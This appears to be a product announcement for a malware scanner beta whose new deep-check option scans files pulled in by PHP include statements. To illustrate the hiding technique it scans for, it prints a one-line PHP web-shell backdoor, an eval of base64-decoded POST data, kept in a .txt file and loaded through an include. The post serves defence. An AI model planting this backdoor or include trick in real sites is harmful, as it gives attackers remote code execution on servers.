Today we have released the beta version 1.30.0 of the ISPProtect Malware Scanner.
To update your ISPProtect instance to the beta version, use ispp_scan --update --channel=beta. Be aware that this beta version might still contain bugs.
Deep scan
Some attackers do not embed their malware into existing or new PHP files. Instead, they place it in files with non-PHP extensions such as .txt and pull it into PHP files using require(), include() and similar statements. This makes the malware harder to recognize, because during malware research admins usually look into the PHP files and might overlook the suspicious includes.
The new version of ISPProtect has a new scan argument, --deep-check. With this argument enabled, ISPProtect searches PHP files for include/require statements, locates the files they include and scans those files, too.
Let's have a look at an example.
Malware example
Here we have a file called "database.txt" that contains the malicious code:
<?php eval(base64_decode($_POST['mypost']));
This file is normally not executed by the PHP interpreter and can do no harm by itself, but now imagine the following PHP file:
<?php
/* some real harmless code here */
define('PTH', realpath(dirname(__FILE__)));
include PTH . "/" . "database.txt";
This makes the database.txt file anything but harmless: the code includes the contents of the .txt file and interprets them as PHP code, which allows the attacker to execute any command he wants.
Of course, the new version also contains new malware and false positive signatures.
Marius Burkard has been working as a software developer for 20 years and has several years of experience as a server administrator. As one of the lead developers of the ISPConfig control panel and technical contact for several hundred web hosting customers, he has extensive experience with malware, hacked websites and the analysis of vulnerabilities.